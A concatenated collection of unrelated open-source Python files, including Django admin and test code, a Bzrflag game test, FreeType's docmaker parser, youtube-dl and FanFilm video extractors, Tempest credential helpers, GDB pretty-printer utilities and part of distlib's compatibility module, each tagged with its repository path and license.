queryset = parent_model._default_manager.all()
# optional feature: limit choices base on existing relationships
# queryset = queryset.complex_filter(
# {'%s__isnull' % reverse_path: False})
limit_choices_to = get_limit_choices_to_from_path(model, field_path)
queryset = queryset.filter(limit_choices_to)
self.lookup_choices = (queryset
.distinct()
.order_by(field.name)
.values_list(field.name, flat=True))
super(AllValuesFieldListFilter, self).__init__(
field, request, params, model, admin_view, field_path)
def choices(self):
yield {
'selected': (self.lookup_exact_val is '' and self.lookup_isnull_val is ''),
'query_string': self.query_string({}, [self.lookup_exact_name, self.lookup_isnull_name]),
'display': _('All'),
}
include_none = False
for val in self.lookup_choices:
if val is None:
include_none = True
continue
val = smart_text(val)
yield {
'selected': self.lookup_exact_val == val,
'query_string': self.query_string({self.lookup_exact_name: val},
[self.lookup_isnull_name]),
'display': val,
}
if include_none:
yield {
'selected': bool(self.lookup_isnull_val),
'query_string': self.query_string({self.lookup_isnull_name: 'True'},
[self.lookup_exact_name]),
'display': EMPTY_CHANGELIST_VALUE,
}
| gpl-3.0 |
itcropper/tanks | tests/game.py | 20 | 1881 | #!/usr/bin/env python
# Bzrflag
# Copyright 2008-2011 Brigham Young University
#
# This file is part of Bzrflag.
#
# Bzrflag is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# Bzrflag is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Bzrflag. If not, see <http://www.gnu.org/licenses/>.
#
# Inquiries regarding any further use of Bzrflag, please contact the Copyright
# Licensing Office, Brigham Young University, 3760 HBLL, Provo, UT 84602,
# (801) 422-9339 or 422-3821, e-mail copyright@byu.edu.
"""Unit test for BZRFlag module game.py."""
__author__ = "BYU AML Lab <kseppi@byu.edu>"
__copyright__ = "Copyright 2008-2011 Brigham Young University"
__license__ = "GNU GPL"
import os
import unittest
from bzrflag import game, config
class GameTest(unittest.TestCase):
def setUp(self):
path = os.path.dirname(__file__)
world = "--world="+os.path.join(path, "..", "maps", "test.bzw")
self.config = config.Config(['--test', world])
self.game_loop = game.GameLoop(self.config)
self.game_loop.update_game()
self.team = "red"
def tearDown(self):
del self.game_loop
def testInitialization(self):
self.team = self.game_loop.game.teams['green']
self.assertNotEqual(self.team._obstacles,[])
self.assertEquals(len(list(self.game_loop.game.tanks())), 40)
self.assertEquals(len(list(self.game_loop.game.shots())), 0)
# vim: et sw=4 sts=4
| gpl-3.0 |
tuxerman/cdn-old | cdn/provider/mock/driver.py | 1 | 1130 | # Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CDN Provider implementation."""
from cdn.common import decorators
from cdn.openstack.common import log as logging
from cdn import provider
from cdn.provider.mock import controllers
from oslo.config import cfg
LOG = logging.getLogger(__name__)
class CDNProvider(provider.CDNProviderBase):
def __init__(self, conf):
super(CDNProvider, self).__init__(conf)
def is_alive(self):
return True
@decorators.lazy_property(write=False)
def service_controller(self):
return controllers.ServiceController()
| apache-2.0 |
simonfork/aquaria | ExternalLibs/freetype2/src/tools/docmaker/sources.py | 367 | 10766 | # Sources (c) 2002, 2003, 2004, 2006, 2007, 2008, 2009
# David Turner <david@freetype.org>
#
#
# this file contains definitions of classes needed to decompose
# C sources files into a series of multi-line "blocks". There are
# two kinds of blocks:
#
# - normal blocks, which contain source code or ordinary comments
#
# - documentation blocks, which have restricted formatting, and
# whose text always start with a documentation markup tag like
# "<Function>", "<Type>", etc..
#
# the routines used to process the content of documentation blocks
# are not contained here, but in "content.py"
#
# the classes and methods found here only deal with text parsing
# and basic documentation block extraction
#
import fileinput, re, sys, os, string
################################################################
##
## BLOCK FORMAT PATTERN
##
## A simple class containing compiled regular expressions used
## to detect potential documentation format block comments within
## C source code
##
## note that the 'column' pattern must contain a group that will
## be used to "unbox" the content of documentation comment blocks
##
class SourceBlockFormat:
def __init__( self, id, start, column, end ):
"""create a block pattern, used to recognize special documentation blocks"""
self.id = id
self.start = re.compile( start, re.VERBOSE )
self.column = re.compile( column, re.VERBOSE )
self.end = re.compile( end, re.VERBOSE )
#
# format 1 documentation comment blocks look like the following:
#
# /************************************/
# /* */
# /* */
# /* */
# /************************************/
#
# we define a few regular expressions here to detect them
#
start = r'''
\s* # any number of whitespace
/\*{2,}/ # followed by '/' and at least two asterisks then '/'
\s*$ # probably followed by whitespace
'''
column = r'''
\s* # any number of whitespace
/\*{1} # followed by '/' and precisely one asterisk
([^*].*) # followed by anything (group 1)
\*{1}/ # followed by one asterisk and a '/'
\s*$ # probably followed by whitespace
'''
re_source_block_format1 = SourceBlockFormat( 1, start, column, start )
#
# format 2 documentation comment blocks look like the following:
#
# /************************************ (at least 2 asterisks)
# *
# *
# *
# *
# **/ (1 or more asterisks at the end)
#
# we define a few regular expressions here to detect them
#
start = r'''
\s* # any number of whitespace
/\*{2,} # followed by '/' and at least two asterisks
\s*$ # probably followed by whitespace
'''
column = r'''
\s* # any number of whitespace
\*{1}(?!/) # followed by precisely one asterisk not followed by `/'
(.*) # then anything (group1)
'''
end = r'''
\s* # any number of whitespace
\*+/ # followed by at least one asterisk, then '/'
'''
re_source_block_format2 = SourceBlockFormat( 2, start, column, end )
#
# the list of supported documentation block formats, we could add new ones
# relatively easily
#
re_source_block_formats = [re_source_block_format1, re_source_block_format2]
#
# the following regular expressions corresponds to markup tags
# within the documentation comment blocks. they're equivalent
# despite their different syntax
#
# notice how each markup tag _must_ begin a new line
#
re_markup_tag1 = re.compile( r'''\s*<(\w*)>''' ) # <xxxx> format
re_markup_tag2 = re.compile( r'''\s*@(\w*):''' ) # @xxxx: format
#
# the list of supported markup tags, we could add new ones relatively
# easily
#
re_markup_tags = [re_markup_tag1, re_markup_tag2]
#
# used to detect a cross-reference, after markup tags have been stripped
#
re_crossref = re.compile( r'@(\w*)(.*)' )
#
# used to detect italic and bold styles in paragraph text
#
re_italic = re.compile( r"_(\w(\w|')*)_(.*)" ) # _italic_
re_bold = re.compile( r"\*(\w(\w|')*)\*(.*)" ) # *bold*
#
# used to detect the end of commented source lines
#
re_source_sep = re.compile( r'\s*/\*\s*\*/' )
#
# used to perform cross-reference within source output
#
re_source_crossref = re.compile( r'(\W*)(\w*)' )
#
# a list of reserved source keywords
#
re_source_keywords = re.compile( '''\\b ( typedef |
struct |
enum |
union |
const |
char |
int |
short |
long |
void |
signed |
unsigned |
\#include |
\#define |
\#undef |
\#if |
\#ifdef |
\#ifndef |
\#else |
\#endif ) \\b''', re.VERBOSE )
################################################################
##
## SOURCE BLOCK CLASS
##
## A SourceProcessor is in charge of reading a C source file
## and decomposing it into a series of different "SourceBlocks".
## each one of these blocks can be made of the following data:
##
## - A documentation comment block that starts with "/**" and
## whose exact format will be discussed later
##
## - normal sources lines, including comments
##
## the important fields in a text block are the following ones:
##
## self.lines : a list of text lines for the corresponding block
##
## self.content : for documentation comment blocks only, this is the
## block content that has been "unboxed" from its
## decoration. This is None for all other blocks
## (i.e. sources or ordinary comments with no starting
## markup tag)
##
class SourceBlock:
def __init__( self, processor, filename, lineno, lines ):
self.processor = processor
self.filename = filename
self.lineno = lineno
self.lines = lines[:]
self.format = processor.format
self.content = []
if self.format == None:
return
words = []
# extract comment lines
lines = []
for line0 in self.lines:
m = self.format.column.match( line0 )
if m:
lines.append( m.group( 1 ) )
# now, look for a markup tag
for l in lines:
l = string.strip( l )
if len( l ) > 0:
for tag in re_markup_tags:
if tag.match( l ):
self.content = lines
return
def location( self ):
return "(" + self.filename + ":" + repr( self.lineno ) + ")"
# debugging only - not used in normal operations
def dump( self ):
if self.content:
print "{{{content start---"
for l in self.content:
print l
print "---content end}}}"
return
fmt = ""
if self.format:
fmt = repr( self.format.id ) + " "
for line in self.lines:
print line
################################################################
##
## SOURCE PROCESSOR CLASS
##
## The SourceProcessor is in charge of reading a C source file
## and decomposing it into a series of different "SourceBlock"
## objects.
##
## each one of these blocks can be made of the following data:
##
## - A documentation comment block that starts with "/**" and
## whose exact format will be discussed later
##
## - normal sources lines, include comments
##
##
class SourceProcessor:
def __init__( self ):
"""initialize a source processor"""
self.blocks = []
self.filename = None
self.format = None
self.lines = []
def reset( self ):
"""reset a block processor, clean all its blocks"""
self.blocks = []
self.format = None
def parse_file( self, filename ):
"""parse a C source file, and add its blocks to the processor's list"""
self.reset()
self.filename = filename
fileinput.close()
self.format = None
self.lineno = 0
self.lines = []
for line in fileinput.input( filename ):
# strip trailing newlines, important on Windows machines!
if line[-1] == '\012':
line = line[0:-1]
if self.format == None:
self.process_normal_line( line )
else:
if self.format.end.match( line ):
# that's a normal block end, add it to 'lines' and
# create a new block
self.lines.append( line )
self.add_block_lines()
elif self.format.column.match( line ):
# that's a normal column line, add it to 'lines'
self.lines.append( line )
else:
# humm.. this is an unexpected block end,
# create a new block, but don't process the line
self.add_block_lines()
# we need to process the line again
self.process_normal_line( line )
# record the last lines
self.add_block_lines()
def process_normal_line( self, line ):
"""process a normal line and check whether it is the start of a new block"""
for f in re_source_block_formats:
if f.start.match( line ):
self.add_block_lines()
self.format = f
self.lineno = fileinput.filelineno()
self.lines.append( line )
def add_block_lines( self ):
"""add the current accumulated lines and create a new block"""
if self.lines != []:
block = SourceBlock( self, self.filename, self.lineno, self.lines )
self.blocks.append( block )
self.format = None
self.lines = []
# debugging only, not used in normal operations
def dump( self ):
"""print all blocks in a processor"""
for b in self.blocks:
b.dump()
# eof
| gpl-2.0 |
jomo/youtube-dl | youtube_dl/extractor/thvideo.py | 151 | 3033 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
unified_strdate
)
class THVideoIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?thvideo\.tv/(?:v/th|mobile\.php\?cid=)(?P<id>[0-9]+)'
_TEST = {
'url': 'http://thvideo.tv/v/th1987/',
'md5': 'fa107b1f73817e325e9433505a70db50',
'info_dict': {
'id': '1987',
'ext': 'mp4',
'title': '【动画】秘封活动记录 ~ The Sealed Esoteric History.分镜稿预览',
'display_id': 'th1987',
'thumbnail': 'http://thvideo.tv/uploadfile/2014/0722/20140722013459856.jpg',
'description': '社团京都幻想剧团的第一个东方二次同人动画作品「秘封活动记录 ~ The Sealed Esoteric History.」 本视频是该动画第一期的分镜草稿...',
'upload_date': '20140722'
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
# extract download link from mobile player page
webpage_player = self._download_webpage(
'http://thvideo.tv/mobile.php?cid=%s-0' % (video_id),
video_id, note='Downloading video source page')
video_url = self._html_search_regex(
r'<source src="(.*?)" type', webpage_player, 'video url')
# extract video info from main page
webpage = self._download_webpage(
'http://thvideo.tv/v/th%s' % (video_id), video_id)
title = self._og_search_title(webpage)
display_id = 'th%s' % video_id
thumbnail = self._og_search_thumbnail(webpage)
description = self._og_search_description(webpage)
upload_date = unified_strdate(self._html_search_regex(
r'span itemprop="datePublished" content="(.*?)">', webpage,
'upload date', fatal=False))
return {
'id': video_id,
'ext': 'mp4',
'url': video_url,
'title': title,
'display_id': display_id,
'thumbnail': thumbnail,
'description': description,
'upload_date': upload_date
}
class THVideoPlaylistIE(InfoExtractor):
_VALID_URL = r'http?://(?:www\.)?thvideo\.tv/mylist(?P<id>[0-9]+)'
_TEST = {
'url': 'http://thvideo.tv/mylist2',
'info_dict': {
'id': '2',
'title': '幻想万華鏡',
},
'playlist_mincount': 23,
}
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
list_title = self._html_search_regex(
r'<h1 class="show_title">(.*?)<b id', webpage, 'playlist title',
fatal=False)
entries = [
self.url_result('http://thvideo.tv/v/th' + id, 'THVideo')
for id in re.findall(r'<dd><a href="http://thvideo.tv/v/th(\d+)/" target=', webpage)]
return self.playlist_result(entries, playlist_id, list_title)
| unlicense |
lzw120/django | tests/modeltests/custom_pk/models.py | 34 | 1122 | # -*- coding: utf-8 -*-
"""
14. Using a custom primary key
By default, Django adds an ``"id"`` field to each model. But you can override
this behavior by explicitly adding ``primary_key=True`` to a field.
"""
from __future__ import absolute_import
from django.db import models
from .fields import MyAutoField
class Employee(models.Model):
employee_code = models.IntegerField(primary_key=True, db_column = 'code')
first_name = models.CharField(max_length=20)
last_name = models.CharField(max_length=20)
class Meta:
ordering = ('last_name', 'first_name')
def __unicode__(self):
return u"%s %s" % (self.first_name, self.last_name)
class Business(models.Model):
name = models.CharField(max_length=20, primary_key=True)
employees = models.ManyToManyField(Employee)
class Meta:
verbose_name_plural = 'businesses'
def __unicode__(self):
return self.name
class Bar(models.Model):
id = MyAutoField(primary_key=True, db_index=True)
def __unicode__(self):
return repr(self.pk)
class Foo(models.Model):
bar = models.ForeignKey(Bar)
| bsd-3-clause |
pnavarro/neutron | neutron/tests/tempest/common/cred_provider.py | 47 | 4598 | # Copyright (c) 2014 Deutsche Telekom AG
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from oslo_log import log as logging
import six
from neutron.tests.tempest import auth
from neutron.tests.tempest import config
from neutron.tests.tempest import exceptions
CONF = config.CONF
LOG = logging.getLogger(__name__)
# Type of credentials available from configuration
CREDENTIAL_TYPES = {
'identity_admin': ('identity', 'admin'),
'user': ('identity', None),
'alt_user': ('identity', 'alt')
}
DEFAULT_PARAMS = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests
}
# Read credentials from configuration, builds a Credentials object
# based on the specified or configured version
def get_configured_credentials(credential_type, fill_in=True,
identity_version=None):
identity_version = identity_version or CONF.identity.auth_version
if identity_version not in ('v2', 'v3'):
raise exceptions.InvalidConfiguration(
'Unsupported auth version: %s' % identity_version)
if credential_type not in CREDENTIAL_TYPES:
raise exceptions.InvalidCredentials()
conf_attributes = ['username', 'password', 'tenant_name']
if identity_version == 'v3':
conf_attributes.append('domain_name')
# Read the parts of credentials from config
params = DEFAULT_PARAMS.copy()
section, prefix = CREDENTIAL_TYPES[credential_type]
for attr in conf_attributes:
_section = getattr(CONF, section)
if prefix is None:
params[attr] = getattr(_section, attr)
else:
params[attr] = getattr(_section, prefix + "_" + attr)
# Build and validate credentials. We are reading configured credentials,
# so validate them even if fill_in is False
credentials = get_credentials(fill_in=fill_in, **params)
if not fill_in:
if not credentials.is_valid():
msg = ("The %s credentials are incorrectly set in the config file."
" Double check that all required values are assigned" %
credential_type)
raise exceptions.InvalidConfiguration(msg)
return credentials
# Wrapper around auth.get_credentials to use the configured identity version
# is none is specified
def get_credentials(fill_in=True, identity_version=None, **kwargs):
params = dict(DEFAULT_PARAMS, **kwargs)
identity_version = identity_version or CONF.identity.auth_version
# In case of "v3" add the domain from config if not specified
if identity_version == 'v3':
domain_fields = set(x for x in auth.KeystoneV3Credentials.ATTRIBUTES
if 'domain' in x)
if not domain_fields.intersection(kwargs.keys()):
kwargs['user_domain_name'] = CONF.identity.admin_domain_name
auth_url = CONF.identity.uri_v3
else:
auth_url = CONF.identity.uri
return auth.get_credentials(auth_url,
fill_in=fill_in,
identity_version=identity_version,
**params)
@six.add_metaclass(abc.ABCMeta)
class CredentialProvider(object):
def __init__(self, name, password='pass', network_resources=None):
self.name = name
@abc.abstractmethod
def get_primary_creds(self):
return
@abc.abstractmethod
def get_admin_creds(self):
return
@abc.abstractmethod
def get_alt_creds(self):
return
@abc.abstractmethod
def clear_isolated_creds(self):
return
@abc.abstractmethod
def is_multi_user(self):
return
@abc.abstractmethod
def is_multi_tenant(self):
return
@abc.abstractmethod
def get_creds_by_roles(self, roles, force_new=False):
return
@abc.abstractmethod
def is_role_available(self, role):
return
| apache-2.0 |
mrjaydee82/SinLessKernel-4.4.4 | toolchains/491/share/gdb/python/gdb/printing.py | 75 | 10191 | # Pretty-printer utilities.
# Copyright (C) 2010-2014 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Utilities for working with pretty-printers."""
import gdb
import gdb.types
import re
import sys
if sys.version_info[0] > 2:
# Python 3 removed basestring and long
basestring = str
long = int
class PrettyPrinter(object):
"""A basic pretty-printer.
Attributes:
name: A unique string among all printers for the context in which
it is defined (objfile, progspace, or global(gdb)), and should
meaningfully describe what can be pretty-printed.
E.g., "StringPiece" or "protobufs".
subprinters: An iterable object with each element having a `name'
attribute, and, potentially, "enabled" attribute.
Or this is None if there are no subprinters.
enabled: A boolean indicating if the printer is enabled.
Subprinters are for situations where "one" pretty-printer is actually a
collection of several printers. E.g., The libstdc++ pretty-printer has
a pretty-printer for each of several different types, based on regexps.
"""
# While one might want to push subprinters into the subclass, it's
# present here to formalize such support to simplify
# commands/pretty_printers.py.
def __init__(self, name, subprinters=None):
self.name = name
self.subprinters = subprinters
self.enabled = True
def __call__(self, val):
# The subclass must define this.
raise NotImplementedError("PrettyPrinter __call__")
class SubPrettyPrinter(object):
"""Baseclass for sub-pretty-printers.
Sub-pretty-printers needn't use this, but it formalizes what's needed.
Attributes:
name: The name of the subprinter.
enabled: A boolean indicating if the subprinter is enabled.
"""
def __init__(self, name):
self.name = name
self.enabled = True
def register_pretty_printer(obj, printer, replace=False):
"""Register pretty-printer PRINTER with OBJ.
The printer is added to the front of the search list, thus one can override
an existing printer if one needs to. Use a different name when overriding
an existing printer, otherwise an exception will be raised; multiple
printers with the same name are disallowed.
Arguments:
obj: Either an objfile, progspace, or None (in which case the printer
is registered globally).
printer: Either a function of one argument (old way) or any object
which has attributes: name, enabled, __call__.
replace: If True replace any existing copy of the printer.
Otherwise if the printer already exists raise an exception.
Returns:
Nothing.
Raises:
TypeError: A problem with the type of the printer.
ValueError: The printer's name contains a semicolon ";".
RuntimeError: A printer with the same name is already registered.
If the caller wants the printer to be listable and disableable, it must
follow the PrettyPrinter API. This applies to the old way (functions) too.
If printer is an object, __call__ is a method of two arguments:
self, and the value to be pretty-printed. See PrettyPrinter.
"""
# Watch for both __name__ and name.
# Functions get the former for free, but we don't want to use an
# attribute named __foo__ for pretty-printers-as-objects.
# If printer has both, we use `name'.
if not hasattr(printer, "__name__") and not hasattr(printer, "name"):
raise TypeError("printer missing attribute: name")
if hasattr(printer, "name") and not hasattr(printer, "enabled"):
raise TypeError("printer missing attribute: enabled")
if not hasattr(printer, "__call__"):
raise TypeError("printer missing attribute: __call__")
if obj is None:
if gdb.parameter("verbose"):
gdb.write("Registering global %s pretty-printer ...\n" % name)
obj = gdb
else:
if gdb.parameter("verbose"):
gdb.write("Registering %s pretty-printer for %s ...\n" %
(printer.name, obj.filename))
if hasattr(printer, "name"):
if not isinstance(printer.name, basestring):
raise TypeError("printer name is not a string")
# If printer provides a name, make sure it doesn't contain ";".
# Semicolon is used by the info/enable/disable pretty-printer commands
# to delimit subprinters.
if printer.name.find(";") >= 0:
raise ValueError("semicolon ';' in printer name")
# Also make sure the name is unique.
# Alas, we can't do the same for functions and __name__, they could
# all have a canonical name like "lookup_function".
# PERF: gdb records printers in a list, making this inefficient.
i = 0
for p in obj.pretty_printers:
if hasattr(p, "name") and p.name == printer.name:
if replace:
del obj.pretty_printers[i]
break
else:
raise RuntimeError("pretty-printer already registered: %s" %
printer.name)
i = i + 1
obj.pretty_printers.insert(0, printer)
class RegexpCollectionPrettyPrinter(PrettyPrinter):
"""Class for implementing a collection of regular-expression based pretty-printers.
Intended usage:
pretty_printer = RegexpCollectionPrettyPrinter("my_library")
pretty_printer.add_printer("myclass1", "^myclass1$", MyClass1Printer)
...
pretty_printer.add_printer("myclassN", "^myclassN$", MyClassNPrinter)
register_pretty_printer(obj, pretty_printer)
"""
class RegexpSubprinter(SubPrettyPrinter):
def __init__(self, name, regexp, gen_printer):
super(RegexpCollectionPrettyPrinter.RegexpSubprinter, self).__init__(name)
self.regexp = regexp
self.gen_printer = gen_printer
self.compiled_re = re.compile(regexp)
def __init__(self, name):
super(RegexpCollectionPrettyPrinter, self).__init__(name, [])
def add_printer(self, name, regexp, gen_printer):
"""Add a printer to the list.
The printer is added to the end of the list.
Arguments:
name: The name of the subprinter.
regexp: The regular expression, as a string.
gen_printer: A function/method that given a value returns an
object to pretty-print it.
Returns:
Nothing.
"""
# NOTE: A previous version made the name of each printer the regexp.
# That makes it awkward to pass to the enable/disable commands (it's
# cumbersome to make a regexp of a regexp). So now the name is a
# separate parameter.
self.subprinters.append(self.RegexpSubprinter(name, regexp,
gen_printer))
def __call__(self, val):
"""Lookup the pretty-printer for the provided value."""
# Get the type name.
typename = gdb.types.get_basic_type(val.type).tag
if not typename:
return None
# Iterate over table of type regexps to determine
# if a printer is registered for that type.
# Return an instantiation of the printer if found.
for printer in self.subprinters:
if printer.enabled and printer.compiled_re.search(typename):
return printer.gen_printer(val)
# Cannot find a pretty printer. Return None.
return None
# A helper class for printing enum types. This class is instantiated
# with a list of enumerators to print a particular Value.
class _EnumInstance:
def __init__(self, enumerators, val):
self.enumerators = enumerators
self.val = val
def to_string(self):
flag_list = []
v = long(self.val)
any_found = False
for (e_name, e_value) in self.enumerators:
if v & e_value != 0:
flag_list.append(e_name)
v = v & ~e_value
any_found = True
if not any_found or v != 0:
# Leftover value.
flag_list.append('<unknown: 0x%x>' % v)
return "0x%x [%s]" % (self.val, " | ".join(flag_list))
class FlagEnumerationPrinter(PrettyPrinter):
"""A pretty-printer which can be used to print a flag-style enumeration.
A flag-style enumeration is one where the enumerators are or'd
together to create values. The new printer will print these
symbolically using '|' notation. The printer must be registered
manually. This printer is most useful when an enum is flag-like,
but has some overlap. GDB's built-in printing will not handle
this case, but this printer will attempt to."""
def __init__(self, enum_type):
super(FlagEnumerationPrinter, self).__init__(enum_type)
self.initialized = False
def __call__(self, val):
if not self.initialized:
self.initialized = True
flags = gdb.lookup_type(self.name)
self.enumerators = []
for field in flags.fields():
self.enumerators.append((field.name, field.enumval))
# Sorting the enumerators by value usually does the right
# thing.
self.enumerators.sort(key = lambda x: x.enumval)
if self.enabled:
return _EnumInstance(self.enumerators, val)
else:
return None
| gpl-2.0 |
mrknow/filmkodi | plugin.video.fanfilm/resources/lib/resolvers/realvid.py | 2 | 1129 | # -*- coding: utf-8 -*-
'''
FanFilm Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from resources.lib.libraries import client
def resolve(url):
try:
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://realvid.net/embed-%s.html' % url
result = client.request(url)
url = re.compile('file *: *"(http.+?)"').findall(result)[-1]
return url
except:
return
| apache-2.0 |
sursum/buckanjaren | buckanjaren/lib/python3.5/site-packages/pip/_vendor/distlib/compat.py | 335 | 40801 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2016 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
from __future__ import absolute_import
import os
import re
import sys
try:
import ssl
except ImportError:
ssl = None
if sys.version_info[0] < 3: # pragma: no cover
from StringIO import StringIO
string_types = basestring,
text_type = unicode
from types import FileType as file_type
import __builtin__ as builtins
import ConfigParser as configparser
from ._backport import shutil
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit
from urllib import (urlretrieve, quote as _quote, unquote, url2pathname,
pathname2url, ContentTooShortError, splittype)
def quote(s):
if isinstance(s, unicode):
s = s.encode('utf-8')
return _quote(s)
import urllib2
from urllib2 import (Request, urlopen, URLError, HTTPError,
HTTPBasicAuthHandler, HTTPPasswordMgr,
HTTPHandler, HTTPRedirectHandler,
build_opener)
if ssl:
from urllib2 import HTTPSHandler
import httplib
import xmlrpclib
import Queue as queue
from HTMLParser import HTMLParser
import htmlentitydefs
raw_input = raw_input
from itertools import ifilter as filter
from itertools import ifilterfalse as filterfalse
_userprog = None
def splituser(host):
"""splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]'."""
global _userprog
if _userprog is None:
import re
_userprog = re.compile('^(.*)@(.*)$')
match = _userprog.match(host)
if match: return match.group(1, 2)
return None, host
else: # pragma: no cover
from io import StringIO
string_types = str,
text_type = str
from io import TextIOWrapper as file_type
import builtins
import configparser
import shutil
from urllib.parse import (urlparse, urlunparse, urljoin, splituser, quote,
unquote, urlsplit, urlunsplit, splittype)
from urllib.request import (urlopen, urlretrieve, Request, url2pathname,
pathname2url,
HTTPBasicAuthHandler, HTTPPasswordMgr,
HTTPHandler, HTTPRedirectHandler,
build_opener)
if ssl:
from urllib.request import HTTPSHandler
from urllib.error import HTTPError, URLError, ContentTooShortError
import http.client as httplib
import urllib.request as urllib2
import xmlrpc.client as xmlrpclib
import queue
from html.parser import HTMLParser
import html.entities as htmlentitydefs
raw_input = input
from itertools import filterfalse
filter = filter
try:
from ssl import match_hostname, CertificateError
except ImportError: # pragma: no cover
class CertificateError(ValueError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
parts = dn.split('.')
leftmost, remainder = parts[0], parts[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survey of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate, match_hostname needs a "
"SSL socket or SSL context with either "
"CERT_OPTIONAL or CERT_REQUIRED")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
try:
from types import SimpleNamespace as Container
except ImportError: # pragma: no cover
class Container(object):
"""
A generic container for when multiple values need to be returned
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
try:
from shutil import which
except ImportError: # pragma: no cover
# Implementation from Python 3.3
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
